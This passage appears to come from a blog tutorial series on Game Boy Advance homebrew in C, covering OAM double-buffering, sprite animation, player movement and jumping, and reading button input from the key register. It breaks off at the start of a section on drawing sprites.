Perfect! Now we’re ready to get down to the fun stuff!

Getting our Character On Screen

I always like to work in small, easily verifiable steps when I’m learning something new. So before we dig really far into animating our character, let’s just get our hero on screen. We covered this in an earlier post, but today I want to do things a bit differently. Since we’re animating our character today, we should probably talk about double buffering object memory.

Since the GBA hardware draws the screen 1 line at a time, it’s possible to modify the object memory for a sprite while it’s being drawn. In some cases this will just mean a bit of tearing (if the sprite is moving), but in the case of animation, it could lead to the top of the sprite being rendered in a different animation frame from the bottom part. Gross! This isn’t really an issue for us today because we aren’t doing enough work for us to leave the VBLANK pause, but it’s worth noting so that we learn to do things right from the get go.

In order to avoid this potential problem, one thing we can do is to create a second buffer of memory, which shadows object memory. Whenever we want to update something about a sprite in our game logic, we modify the data inside our own copy of object memory. Then when we hit the VBlank pause, we copy all the data from our shadow buffer to real object memory. This lets us do whatever we want in our logic, while keeping our sprites looking exactly how they should.

We could define our object-memory shadow buffer like so:

ObjectAttributes oam_object_backbuffer[128];

Remember that the definition of the ObjectAttributes struct is inside gba.h if you forget what that looks like.

Now we should also add the code to copy data from our backbuffer to the real Object Attribute Memory. For now, I’m just going to copy the first element, because that’s all we need for today. In a real application, you’d probably want to copy the whole thing, or at least larger chunks at a time.

while(1)
{
    vsync();
    MEM_OAM[0] = oam_object_backbuffer[0];
}
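If you do want to copy the whole thing, a sketch might look like the following. I’m using a stand-in struct here so the snippet compiles on its own; I’m assuming it has the same layout as the ObjectAttributes struct in gba.h (three 16 bit attributes plus a padding halfword), and flushShadowOam is a hypothetical name. It copies field by field because the destination is volatile, and it leaves the padding halfword alone.

```cpp
#include <cstddef>
#include <cstdint>

// Stand-in for the ObjectAttributes struct (assumed layout, see above).
struct ObjAttrStandIn
{
    std::uint16_t attr0;
    std::uint16_t attr1;
    std::uint16_t attr2;
    std::uint16_t pad;
};

constexpr std::size_t OAM_ENTRY_COUNT = 128;

// Copies the three attributes of every entry from the shadow buffer into
// the real (volatile) object memory. Meant to be called during VBlank.
void flushShadowOam(volatile ObjAttrStandIn* realOam,
                    const ObjAttrStandIn* shadow,
                    std::size_t count = OAM_ENTRY_COUNT)
{
    for (std::size_t i = 0; i < count; ++i)
    {
        realOam[i].attr0 = shadow[i].attr0;
        realOam[i].attr1 = shadow[i].attr1;
        realOam[i].attr2 = shadow[i].attr2;
    }
}
```

With the real ObjectAttributes type swapped in, the call would sit right after vsync() in the loop, in place of the single element copy.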

Now that that’s set up, let’s actually put something useful into our backbuffer.

ObjectAttributes *spriteAttribs = &oam_object_backbuffer[0];
spriteAttribs->attr0 = 0x2000;
spriteAttribs->attr1 = 0x4000;
spriteAttribs->attr2 = 0;

Which means that, when everything is put together, your main function should look like this:

int main()
{

    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    ObjectAttributes *spriteAttribs = &oam_object_backbuffer[0];
    spriteAttribs->attr0 = 0x2000;
    spriteAttribs->attr1 = 0x4000;
    spriteAttribs->attr2 = 0;

    while(1)
    {
        vsync();
        MEM_OAM[0] = oam_object_backbuffer[0];
    }

    return 0;
}

With the sprite defined like we have, running the program should yield this:

Perfect! Now we know our data is in memory correctly! Next let’s get some animations going.

Hello Sprite Animation

Before we dig into making our hero run and jump, let’s just get his idle animation cycle running to be sure that things are working how we expect. In the sprite sheet that I provided earlier, the animation cycle is located in the first 4 frames. We want to have our hero cycle through these frames whenever he isn’t moving.

Setting up a single animation like this is really simple, because all we need to do is point attr2 in our sprite attributes to a new place in tile memory. You’ll notice that right now, our sprite is simply stuck on the first frame of his idle animation. This is because we put the sprites into tile memory at the start of the tile block, so the index of the first frame is 0. It stands to reason that updating this should just be a simple add…

spriteAttribs->attr2 = (spriteAttribs->attr2 + 1) % 4;

buuut it isn’t! Remember that attr2 is the index of the tile to use to render the top left most part of your sprite. Since our sprite is 2 tiles by 2 tiles, this means that in theory, to advance a whole frame, our attr2 value must increment by 4. In reality, since we are using 8bpp tiles, we have to double that, so advancing a frame of animation means advancing attr2 by 8. With that in mind, running our idle loop actually requires the following:

spriteAttribs->attr2 = (spriteAttribs->attr2 + 8) % 32;

With that bit of code added to the update loop, our protagonist should now be happily bouncing in place:
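To spell out where the 8 and the 32 in that line come from, here’s the same arithmetic as a tiny sketch. The constant and function names are made up for illustration, and it assumes the idle cycle really is the first 4 frames of a sheet of 16x16, 8bpp sprites.

```cpp
// A 16x16 sprite is 2 tiles wide and 2 tiles tall.
constexpr int TILES_PER_FRAME = 2 * 2;

// With 8bpp tiles, each tile advances the attr2 index by 2 instead of 1.
constexpr int INDEX_UNITS_PER_8BPP_TILE = 2;

// So one whole frame of animation is 8 index units.
constexpr int INDEX_STEP_PER_FRAME = TILES_PER_FRAME * INDEX_UNITS_PER_8BPP_TILE;

constexpr int IDLE_FRAME_COUNT = 4;

// attr2 tile index for a given frame of the idle cycle (wraps around).
constexpr int tileIndexForIdleFrame(int frame)
{
    return (frame % IDLE_FRAME_COUNT) * INDEX_STEP_PER_FRAME;
}

// Advances an attr2 tile index to the next idle frame, wrapping back to 0.
constexpr int nextIdleTileIndex(int attr2)
{
    return (attr2 + INDEX_STEP_PER_FRAME) % (IDLE_FRAME_COUNT * INDEX_STEP_PER_FRAME);
}
```

The idle frames therefore live at tile indices 0, 8, 16 and 24, and stepping past 24 wraps back around to 0.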

Alright, with that in mind, let’s move on to actually hooking up some input and getting this guy moving around the screen.

Setting Up Input

Just like last time, all our input handling code is stored in input.h, so make sure that you add that to your includes. Once that’s included, just make sure to add a call to key_poll in your main loop, otherwise we’ll never know when the input state changes. If you’re following along, your main loop should look like this:

while(1)
{
    vsync();
    key_poll();

    spriteAttribs->attr2 = (spriteAttribs->attr2 + 8) % 32;

    MEM_OAM[0] = oam_object_backbuffer[0];
}

Before we get to actually writing our movement and animation functions, there’s one last bit of theory to get out of the way: there are some new bits in the object attributes attr1 variable that we’re going to need today.

More Details About Object Attributes

When I last talked about sprites, I presented 3 tables describing which bits in the sprite attribute values corresponded to what. In the interest of simplicity, I left out a lot of details. In this post, we need to fill in one of those details, so here is a more complete description of what attribute 1 does:

Attr 1	0x FEDC BA98 7654 3210
FE	Sprite Size (discussed below)
D	Vertical Flip
C	Horizontal Flip
BA9	Not Used Today
8 7654 3210	X coordinate

Yes, there’s still some data we don’t need to worry about, but the things to pay attention to here are the bit flags for vertical and horizontal flipping. You may have noticed that our sprites only have our protagonist facing one way; the horizontal flip flag is how we’re going to handle the other direction.
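To make the bit layout a little more concrete, here is a rough sketch of a helper that packs an attribute 1 value from its parts. The name packAttr1 and the ATTR1_ constants are made up for this illustration and aren't part of the project code; on hardware the X field is 9 bits wide (bits 0 to 8), which is what the mask below assumes.

```c
#include <assert.h>
#include <stdint.h>

/* Bit positions for attribute 1 (hypothetical constant names). */
#define ATTR1_X_MASK     0x01FFu  /* X coordinate, bits 0 to 8 */
#define ATTR1_HFLIP      0x1000u  /* bit C */
#define ATTR1_VFLIP      0x2000u  /* bit D */
#define ATTR1_SIZE_SHIFT 14       /* bits F and E */

/* packAttr1 is an illustrative helper, not a function from the tutorial. */
uint16_t packAttr1(int x, int hflip, int vflip, unsigned size)
{
    unsigned value = (unsigned)x & ATTR1_X_MASK;

    if (hflip) value |= ATTR1_HFLIP;
    if (vflip) value |= ATTR1_VFLIP;
    value |= (size & 3u) << ATTR1_SIZE_SHIFT;

    return (uint16_t)value;
}

void demoPackAttr1(void)
{
    /* size 1, no flipping, x = 10 */
    assert(packAttr1(10, 0, 0, 1) == 0x400A);
    /* the same sprite mirrored horizontally */
    assert(packAttr1(10, 1, 0, 1) == 0x500A);
}
```

Setting the horizontal flip bit changes nothing except bit C, which is why a single set of right-facing sprites is enough.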

Moving Our Hero

Let’s tackle moving our hero around the screen next, and finish off with adding support for the rest of our animation frames. To make things easier (and more readable), I’m going to define a struct to hold all the information we need to move and animate our hero. For simplicity’s sake, I’m just going to make all the fields we need ints.

Here’s what my struct and its initialization code look like:

const int FLOOR_Y = 160-16;

typedef struct
{
    ObjectAttributes* spriteAttribs;
    int facingRight;
    int firstAnimCycleFrame;
    int animFrame;
    int posX;
    int posY;
    int velX;
    int velY;
    int framesInAir;
}HeroSprite;

void InitializeHeroSprite(HeroSprite* sprite, ObjectAttributes* attribs)
{
    sprite->spriteAttribs = attribs;
    sprite->facingRight = 1;
    sprite->firstAnimCycleFrame = 0;
    sprite->animFrame = 0;
    sprite->posX = 0;
    sprite->posY = FLOOR_Y;
    sprite->velX = 0;
    sprite->velY = 0;
    sprite->framesInAir = 0;
}

Nothing too fancy here. Notice though, that I also defined a constant for the location of the “floor”, which is actually 16 pixels above the bottom of the screen. This is because our hero is 16 pixels tall and when you set a sprite’s position, you set its top left corner; thus, for simplicity, I’ve defined the floor Y as the location of the top of our hero’s head when he’s on the floor.

To handle character movement, I’m going to create another function called updateSpritePosition.

void updateSpritePosition(HeroSprite* sprite);

This function is going to first determine our hero’s velocity for the current frame, and then add those velocities to his position. It will also set up a few other bits of data that we’ll use later when determining what animation frame to display, and actually translate these struct member vars into actual values inside object attribute memory. To start with though, let’s just start dealing with user input from the DPAD:

const int WALK_SPEED = 4;

void updateSpritePosition(HeroSprite* sprite)
{
    if (getKeyState(KEY_LEFT))
    {
        sprite->facingRight = 0;
        sprite->velX = -WALK_SPEED;
    }
    else if (getKeyState(KEY_RIGHT))
    {
        sprite->facingRight = 1;
        sprite->velX = WALK_SPEED;
    }
    else sprite->velX = 0;

    sprite->posX += sprite->velX;
    sprite->posX = min(240-16, sprite->posX);
    sprite->posX = max(0, sprite->posX);

This should all be pretty straightforward. The only bit you may be wondering about is the facingRight flag. We’re going to use this later to handle horizontally flipping our sprites so that we can use one set of sprites but have our hero be able to look and move both left and right. Also note that I’m clamping the x position to keep our sprite on the screen at all times.
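One thing worth flagging: min and max aren't part of standard C, so the snippet above presumably relies on macros or helpers defined elsewhere in the project. As a sketch of the same clamping step with nothing assumed from outside, something like the following would do (clampInt and stepHeroX are names invented for this example):

```c
#include <assert.h>

#define SCREEN_WIDTH 240
#define HERO_WIDTH   16

/* Keep value inside [lo, hi]. */
static int clampInt(int value, int lo, int hi)
{
    if (value < lo) return lo;
    if (value > hi) return hi;
    return value;
}

/* Apply one frame of horizontal velocity and keep the sprite on screen. */
int stepHeroX(int posX, int velX)
{
    return clampInt(posX + velX, 0, SCREEN_WIDTH - HERO_WIDTH);
}

void demoStepHeroX(void)
{
    assert(stepHeroX(100, 4) == 104);  /* free movement */
    assert(stepHeroX(222, 4) == 224);  /* stopped at the right edge */
    assert(stepHeroX(2, -4) == 0);     /* stopped at the left edge */
}
```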

Next, we need to add support for jumping. Note that if we’re already in the air, we don’t want to jump again, so we’re going to have to take that into account:

void updateSpritePosition(HeroSprite* sprite)
{
    //previous code omitted for brevity

    int isMidAir = sprite->posY != FLOOR_Y;

    if (getKeyState(KEY_A))
    {
        if (!isMidAir)
        {
            sprite->velY = JUMP_VI;
            sprite->framesInAir = 0;
        }
    }

    if (isMidAir)
    {
        sprite->velY = JUMP_VI + (GRAVITY * sprite->framesInAir);
        sprite->velY = min(5, sprite->velY);
        sprite->framesInAir++;
    }

    sprite->posY += sprite->velY;
    sprite->posY = min(sprite->posY, FLOOR_Y);
}

Hopefully nothing here is surprising. If you haven’t implemented gravity before, you may want to check out this excellent article on Khan Academy about Kinematic equations. Since they’re not the focus of today, that’s all I’m going to say about them here. I’m using the framesInAir variable in place of an actual time calculation for now, which is why it gets reset whenever a new jump starts.
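If you'd like to see what the jump logic does frame by frame without running it on a GBA, here is a small off-device sketch. The values of JUMP_VI and GRAVITY below are assumptions picked for the example (the post doesn't show the real ones), and stepJump and summarizeJump are hypothetical names; the vertical logic itself mirrors the function above.

```c
#include <assert.h>

#define FLOOR_Y  (160 - 16)
#define JUMP_VI  (-6)  /* assumed initial jump velocity, negative is up */
#define GRAVITY  1     /* assumed per-frame acceleration */
#define MAX_FALL 5     /* falling speed cap, as in the snippet above */

typedef struct { int posY; int velY; int framesInAir; } JumpState;
typedef struct { int frames; int peakY; } JumpSummary;

static int minInt(int a, int b) { return a < b ? a : b; }

/* One frame of vertical movement, with the A button state passed in. */
void stepJump(JumpState *s, int jumpPressed)
{
    int isMidAir = s->posY != FLOOR_Y;

    if (jumpPressed && !isMidAir)
    {
        s->velY = JUMP_VI;
        s->framesInAir = 0;
    }

    if (isMidAir)
    {
        s->velY = minInt(MAX_FALL, JUMP_VI + GRAVITY * s->framesInAir);
        s->framesInAir++;
    }

    s->posY = minInt(s->posY + s->velY, FLOOR_Y);
}

/* Press A on the first frame only, then run until the hero lands. */
JumpSummary summarizeJump(void)
{
    JumpState s = { FLOOR_Y, 0, 0 };
    JumpSummary out = { 0, FLOOR_Y };

    do
    {
        stepJump(&s, out.frames == 0);
        out.frames++;
        if (s.posY < out.peakY) out.peakY = s.posY;
    } while (s.posY != FLOOR_Y && out.frames < 1000);

    return out;
}

void demoJump(void)
{
    JumpSummary jump = summarizeJump();
    assert(jump.frames == 16);  /* frames from take-off to landing */
    assert(jump.peakY == 117);  /* 27 pixels above FLOOR_Y */
}
```

With these assumed constants the hero rises for the first several frames, hangs for one, then falls with the speed capped at 5 pixels per frame.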

None of this code actually moves our sprite, so we need to finish off this function by setting a few key variables:

sprite->spriteAttribs->attr0 = 0x2000 + sprite->posY;
sprite->spriteAttribs->attr1 = (sprite->facingRight? 0x4000 : 0x5000) + sprite->posX;

As you can see, because the lowest bits in these flags store positions, it’s enough for us to just add our x and y position to the end of them. You can also see how the facingRight flag corresponds to the value we set in the horizontal flip bit that we talked about earlier.

Now we need to add a call to this function to main:

int main()
{

    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    HeroSprite sprite;
    InitializeHeroSprite(&sprite, &oam_object_backbuffer[0]);

    while(1)
    {
        vsync();
        key_poll();        

        updateSpritePosition(&sprite);
        MEM_OAM[0] = oam_object_backbuffer[0];
    }
    return 0;
}

And with that, you should be able to move your sprite around using the dpad and A button to jump. He just won’t be animating yet:

Our Animation Function

As the heading suggests, we’re going to be writing one more function today, which is going to implement our animation:

void tickSpriteAnimation(HeroSprite* sprite);

We’re going to be choosing the tile to point our attr2 variable at by setting two separate values, the firstAnimCycleFrame and animFrame values in our HeroSprite struct:

firstAnimCycleFrame will hold the index to the first frame in that animation cycle. Our idle animation cycle is 4 frames long and starts at index 0, so for the idle animation cycle, this will be set to 0
animFrame will hold the current frame of animation we are at in our animation cycle. If we want the third frame of an animation, this would be set to two (since frames are zero indexed)

Knowing that, it’s probably useful for us to take another look at our sprite sheet, and figure out where our idle, run, and jump cycles start in the sheet. I’ve outlined them below:

So that puts our idle cycle starting at index 0, our run cycle at index 4, and our jump cycle at index 7. Given that we use 4 tiles per sprite, and have 8bpp tiles, this means that the real indices we need are:

Idle starts at 0
Run starts at 32
Jump starts at 56
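The arithmetic behind those three numbers can be written down as a tiny helper. This is only a sketch to show where the factor of 8 comes from; tilesPerFrame and cycleStartIndex are names invented for the example.

```c
#include <assert.h>

/* How far attr2 moves per animation frame: one step per tile,
   doubled when the tiles are 8bpp. */
int tilesPerFrame(int tilesWide, int tilesHigh, int is8bpp)
{
    int tiles = tilesWide * tilesHigh;
    return is8bpp ? tiles * 2 : tiles;
}

/* attr2 value of the given frame in the sprite sheet. */
int cycleStartIndex(int firstFrame, int tilesWide, int tilesHigh, int is8bpp)
{
    return firstFrame * tilesPerFrame(tilesWide, tilesHigh, is8bpp);
}

void demoCycleStartIndex(void)
{
    /* our hero: 2x2 tiles, 8bpp */
    assert(cycleStartIndex(0, 2, 2, 1) == 0);   /* idle */
    assert(cycleStartIndex(4, 2, 2, 1) == 32);  /* run  */
    assert(cycleStartIndex(7, 2, 2, 1) == 56);  /* jump */
}
```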

Let’s start off by just writing the first and last line of our function:

void tickSpriteAnimation(HeroSprite* sprite)
{
    ObjectAttributes* spriteAttribs = sprite->spriteAttribs;

    //set firstAnimCycleFrame and animFrame in code here

    spriteAttribs->attr2 = sprite->firstAnimCycleFrame + (sprite->animFrame * 8);
}

This is just to give you an idea of how this function works. Note that if you were using 4bpp sprites, you would only need to multiply animFrame by 4.

Alright, here’s our first, and easiest case: jumping. We only have 2 sprites for jumping, one when we’re on the way up, and one when we’re on the way down.

int isMidAir = sprite->posY != FLOOR_Y;

//pick the rising or falling jump frame
if (isMidAir)
{
    sprite->firstAnimCycleFrame = 56;
    sprite->animFrame = sprite->velY > 0 ? 1 : 0;
}

If we aren’t in the air, the only other two options are that we’re standing still, or that we’re walking around:

else
{
    if (sprite->velX != 0)
    {
        sprite->firstAnimCycleFrame = 32;
        sprite->animFrame = (sprite->animFrame + 1) % 3;
    }
    else
    {
        sprite->firstAnimCycleFrame = 0;
        sprite->animFrame = (sprite->animFrame + 1) % 4;
    }
}

Obviously none of this code is very reusable; we are hardcoding both the length of the anim cycles and their start points in the sprite sheet, but it works for our example.
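For the curious, one way the hardcoding could be pulled out is to describe each cycle with a small struct. This is just a sketch of the idea, not how the project does it; AnimCycle, nextFrame and attr2ForFrame are hypothetical names, and the numbers are the ones worked out earlier in the post.

```c
#include <assert.h>

#define TILES_PER_FRAME 8  /* 2x2 tiles, doubled for 8bpp */

typedef struct
{
    int firstTile;   /* attr2 value of the cycle's first frame */
    int frameCount;  /* number of frames in the cycle */
} AnimCycle;

static const AnimCycle IDLE_CYCLE = { 0, 4 };
static const AnimCycle RUN_CYCLE  = { 32, 3 };
static const AnimCycle JUMP_CYCLE = { 56, 2 };

/* Advance to the next frame, wrapping at the end of the cycle. */
int nextFrame(const AnimCycle *cycle, int currentFrame)
{
    return (currentFrame + 1) % cycle->frameCount;
}

/* Tile index to store in attr2 for a given frame of a cycle. */
int attr2ForFrame(const AnimCycle *cycle, int frame)
{
    return cycle->firstTile + frame * TILES_PER_FRAME;
}

void demoAnimCycle(void)
{
    assert(nextFrame(&IDLE_CYCLE, 3) == 0);      /* idle wraps after 4 frames */
    assert(nextFrame(&RUN_CYCLE, 2) == 0);       /* run wraps after 3 frames */
    assert(attr2ForFrame(&RUN_CYCLE, 2) == 48);  /* last run frame */
    assert(attr2ForFrame(&JUMP_CYCLE, 1) == 64); /* falling frame */
}
```

The animation function would then only need to pick which cycle is active, rather than carrying the start index and length around as magic numbers.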

With the above two chunks of code added to our animation function, all that’s left is to call the animation function from main:

while(1)
{
    vsync();
    key_poll();        

    updateSpritePosition(&sprite);
    tickSpriteAnimation(&sprite);
    MEM_OAM[0] = oam_object_backbuffer[0];
}

And you should (finally) be in possession of your very own animated character!

Wrapping Up

If you got stuck at any part of this, the code for the finished product can be found on github.

Finally, as always, I’m available on Twitter to answer questions, say hi, etc. I’d love to hear if you’re building something for the GBA after reading these posts :)

Have a good one!

GBA By Example - Getting User Input

2017-04-18T00:00:00+00:00

(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found here)

We’ve covered an awful lot of drawing in these posts, but it takes a lot more than drawing code to make a game. One of the key parts of building something playable is letting users actually be able to interact with our code, so today I’m going to go over how to get user input on the GBA. It’s going to be short and sweet, because it’s really not that complicated on this platform, which is great, because it means that we can spend more time on building an example program this week.

By the end of the post today, we’re going to end up with a simple program that displays a sprite and changes the background based on what button was last pressed. It’s going to look something like this:

Initially this cleared the screen after each press so I could properly do the Konami code.
The gif was reeeaalllyy annoying though

Let’s get started :)

Detecting What Keys Are Pressed

I assume if you’re interested in these posts, you already know what a GBA looks like. Just in case, here’s a photo with all the inputs shown:

The GBA has 10 buttons that the user can press while a game is running:

A / B buttons
Start / Select Buttons
R / L Shoulder Buttons
DPAD - (Left, Right, Up, Down)

Each of these buttons can be in one of two states - down or up. Conveniently, the state of every button is stored in a single 16 bit value (with only the lower 10 bits used). This value is known as the Input Register. It, and the location of each key’s corresponding bit are as follows:

REG_INPUT	0x FEDC BA98 7654 3210
FEDCBA	Ignored / Undefined Data
9	Left Shoulder Button
8	Right Shoulder Button
7	DPAD -> Down
6	DPAD -> Up
5	DPAD -> Left
4	DPAD -> Right
3	Start Button
2	Select Button
1	B Button
0	A Button

The only bit of weirdness with all of this is that the GBA represents keys which are in their Up (un-pressed) state with a value of 1, and keys that are pressed with a value of 0. This means that if we were to read the value of the input register while the Start button was pressed, we would expect to see the binary value 0000 0011 1111 0111 (0x03F7). Notice that the bit that corresponds to the Start button is 0, because the button is down.

Turning the above table into a set of constants representing which bit is set for each key looks like this:

#define REG_KEYINPUT  (* (volatile uint16*) 0x4000130)

#define KEY_A        0x0001
#define KEY_B        0x0002
#define KEY_SELECT   0x0004
#define KEY_START    0x0008
#define KEY_RIGHT    0x0010
#define KEY_LEFT     0x0020
#define KEY_UP       0x0040
#define KEY_DOWN     0x0080
#define KEY_R        0x0100
#define KEY_L        0x0200

#define KEY_MASK     0xFC00

and using the above table, a function that returns a non zero value if a key is down might look like this:

uint32 getKeyState(uint16 key_code)
{
    return !(key_code & (REG_KEYINPUT | KEY_MASK) );
}

Because we aren’t immediately inverting the value in the input register (like Tonc does), the bitwise logic for this can be a bit unintuitive, so let’s walk through how the above function works.

For the example, let’s assume that we’re testing to see if the Start button is currently pressed:

First, we get the value from the REG_KEYINPUT register, and OR it with a bit mask that makes sure the undefined bits in the value are set to 1 (called KEY_MASK above)

 INPUT: ???? ??11 1111 0111
 MASK : 1111 1100 0000 0000
 --------------------------
        1111 1111 1111 0111

Next we AND the value with the Start mask: 0x0008

 INPUT: 1111 1111 1111 0111
 START: 0000 0000 0000 1000
 --------------------------
 val =  0000 0000 0000 0000
return (!val); //true, key is DOWN

This gives us 0, because of how the GBA stores key states (remember, 1 is UP), so we return !val to get a non zero value when the button is down.
If instead of the Start mask, we checked a different button, like the A Button:

 INPUT: 1111 1111 1111 0111
 A BTN: 0000 0000 0000 0001
 --------------------------
 val =  0000 0000 0000 0001

return (!val); //false, key is UP

The KEY_MASK constant is important for this function to work, because we have no idea what the top 6 bits of this value are being set to (whatever it is, it’s junk data), and we want to be sure that we’re only testing our key_code value against data that we expect is in the input register.
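The walk-through above is easy to check off-device if the register value is passed in as a parameter instead of being read from hardware. The sketch below does exactly that; keyStateFromRaw is a made-up name for this example, and 0x03F7 is the "Start is held" value from earlier.

```c
#include <assert.h>
#include <stdint.h>

#define KEY_A     0x0001
#define KEY_START 0x0008
#define KEY_MASK  0xFC00

/* Same logic as getKeyState, but the raw register value is an argument
   so the function can run on a PC. Returns 1 when the key is down. */
uint32_t keyStateFromRaw(uint16_t raw, uint16_t key_code)
{
    return !(key_code & (raw | KEY_MASK));
}

void demoKeyStateFromRaw(void)
{
    /* binary 0000 0011 1111 0111: only the Start bit is 0 */
    assert(keyStateFromRaw(0x03F7, KEY_START) == 1);  /* down */
    assert(keyStateFromRaw(0x03F7, KEY_A) == 0);      /* up */

    /* junk in the top 6 bits doesn't change the answer */
    assert(keyStateFromRaw(0xABF7, KEY_START) == 1);
}
```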

Always masking the REG_KEYINPUT register by the KEY_MASK value seems a bit excessive to me though. What I prefer to do (and what you’ll see elsewhere online), is to use a function that stores the value of the input register in a 16 bit variable, and performs the masking then. This function is called once per frame, and then you don’t have to worry about OR-ing with KEY_MASK every time you want to read a value from the hardware:

uint16 input_cur;

inline void key_poll()
{
    input_cur = REG_KEYINPUT | KEY_MASK;
}

uint32 getKeyState(uint16 key_code)
{
    return !(input_cur & key_code);
}

int main()
{
    while(1)
    {
        key_poll();
        if ( getKeyState(KEY_L) )
        {
            //key is down
        }
    }
}

This works, but it only lets us test whether the user is currently holding down a key; it doesn’t let us detect whether the key has just been pressed. That’s fine for things like charging an attack, but not as good for something like triggering a jump, because it’s going to read as true for multiple frames unless your user has the reflexes of a cat.

Detecting Key Press and Key Release

The obvious next thing we need to do is to be able to detect if the user has just started pressing or releasing a button. To do this, we need to store a second input state variable, that holds the input of the previous frame. To determine if a key’s state is new, we just have to compare the current frame’s input register to the one from the previous frame. It makes sense to do this register-copying inside the function we use to store the current frame’s input:

uint16 input_cur;
uint16 input_prev;

void key_poll()
{
    input_prev = input_cur;
    input_cur = REG_KEYINPUT | KEY_MASK;
}

Then all we need are two new functions to detect key press and release:

uint16 wasKeyPressed(uint16 key_code)
{
    //bit was 1 (up) last frame and is 0 (down) now
    return (~input_cur & input_prev) & key_code;
}

uint16 wasKeyReleased(uint16 key_code)
{
    //bit was 0 (down) last frame and is 1 (up) now
    return (input_cur & ~input_prev) & key_code;
}

If you’re confused by the above, writing it out on paper really helps, but I’m going to skip walking through it here because it really only matters long enough to write the above functions.
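If paper isn't handy, the same exercise can be done with a few assertions on a PC. Because 1 means up, a key that was just pressed has a 0 in the current state and a 1 in the previous one, and a release is the other way around. The sketch below takes both states as parameters (justPressed and justReleased are hypothetical names used only here):

```c
#include <assert.h>
#include <stdint.h>

#define KEY_START 0x0008

/* Non zero if key_code went from up (1) to down (0) this frame. */
uint16_t justPressed(uint16_t cur, uint16_t prev, uint16_t key_code)
{
    return (uint16_t)(key_code & (~cur & prev));
}

/* Non zero if key_code went from down (0) to up (1) this frame. */
uint16_t justReleased(uint16_t cur, uint16_t prev, uint16_t key_code)
{
    return (uint16_t)(key_code & (cur & ~prev));
}

void demoKeyEdges(void)
{
    uint16_t allUp     = 0xFFFF;  /* every bit 1: nothing pressed */
    uint16_t startDown = 0xFFF7;  /* only the Start bit is 0 */

    /* frame where Start goes down */
    assert(justPressed(startDown, allUp, KEY_START) == KEY_START);
    assert(justReleased(startDown, allUp, KEY_START) == 0);

    /* Start still held on the next frame: no edge either way */
    assert(justPressed(startDown, startDown, KEY_START) == 0);
    assert(justReleased(startDown, startDown, KEY_START) == 0);

    /* frame where Start comes back up */
    assert(justReleased(allUp, startDown, KEY_START) == KEY_START);
}
```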

When it’s all put together, your input handling code might look like this:

#ifndef INPUT_H
#define INPUT_H

unsigned short input_cur = 0x03FF;
unsigned short input_prev = 0x03FF;

#define REG_KEYINPUT  (* (volatile unsigned short*) 0x4000130)

#define KEY_A        0x0001
#define KEY_B        0x0002
#define KEY_SELECT   0x0004
#define KEY_START    0x0008
#define KEY_RIGHT    0x0010
#define KEY_LEFT     0x0020
#define KEY_UP       0x0040
#define KEY_DOWN     0x0080
#define KEY_R        0x0100
#define KEY_L        0x0200

#define KEY_MASK     0xFC00

inline void key_poll()
{
    input_prev = input_cur;
    input_cur = REG_KEYINPUT | KEY_MASK;
}

inline unsigned short wasKeyPressed(unsigned short key_code)
{
    return (key_code) & (~input_cur & input_prev);
}

inline unsigned short wasKeyReleased(unsigned short key_code)
{
    return  (key_code) & (input_cur & ~input_prev);
}

inline unsigned short getKeyState(unsigned short key_code)
{
    return !(key_code & (input_cur) );
}
#endif

That’s literally all there is to input handling on the GBA! You can stop here if that’s all you’re after, but I took it a step further and built the program you saw at the start of the article. I’m going to walk through how to put that together below.

For the remainder of this post, and all future posts, I’m going to put the input handling code above into input.h.

Sprite and BG Data

All the sprites that I’m using for the example project can be found on github. The data isn’t super compact, but for such a simple program, that’s not really that important. If you want to follow along as I build this, grab the data from there. If you just want the final product, you can find the whole thing on github here.

The function to load the sprite data is as follows:

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint16 ScreenBlock[1024];
typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define MEM_PALETTE             ((uint16*)(0x05000200))
#define MEM_TILE                ((TileBlock*)0x6000000)
#define MEM_OAM            ((volatile ObjectAttributes *)0x07000000)

typedef struct ObjectAttributes {
    uint16 attr0;
    uint16 attr1;
    uint16 attr2;
    uint16 pad;
} __attribute__((packed, aligned(4))) ObjectAttributes;

void LoadTileData()
{
    //each sprite is 32 tiles
    memcpy(MEM_PALETTE, Pal,  PalLen );
    memcpy(&MEM_TILE[4][0], ATiles, TileLen);
    memcpy(&MEM_TILE[4][32], BTiles, TileLen);
    memcpy(&MEM_TILE[4][64], SelectTiles, TileLen);
    memcpy(&MEM_TILE[4][96], StartTiles, TileLen);
    memcpy(&MEM_TILE[4][128], RIGHTTiles, TileLen);
    memcpy(&MEM_TILE[4][160], LEFTTiles, TileLen);
    memcpy(&MEM_TILE[4][192], UPTiles, TileLen);
    memcpy(&MEM_TILE[4][224], DOWNTiles, TileLen);
    memcpy(&MEM_TILE[5][0], LTiles, TileLen);
    memcpy(&MEM_TILE[5][32], RTiles, TileLen);

    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

    spriteAttribs->attr0 = 0x602F;
    spriteAttribs->attr1 = 0xC04F;
    spriteAttribs->attr2 = 0;

}

I’m not going to walk through this, because we’ve already covered how to load and set up sprites in a previous post.

I’m also using a simple 1 colour background in the gif from earlier, which I just created procedurally like so:

#define MEM_BG_PALETTE          ((uint16*)(0x05000000))
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)
#define REG_BG0_CONTROL        *((volatile uint32*)(0x04000008))

void CreateBackground()
{
    MEM_BG_PALETTE[0] = RGB15(0,0,0);

    uint8 tile[64];
    for (int j = 0; j < 64; j++)
    {
        tile[j] = 0;
    }
    memcpy(MEM_TILE[0][0], tile, 64);

    uint16 screenBlock[1024];
    for (int i = 0; i < 1024; i++)
    {
        screenBlock[i] = 0;
    }

    memcpy(MEM_SCREENBLOCKS[1], &screenBlock[0], 2048);

    REG_BG0_CONTROL = 0x0180;

}

Again, I’m not going to talk too much about this, because I covered it last week.

Great! Now that that’s out of the way, let’s do something more interesting.

Drawing Sprites

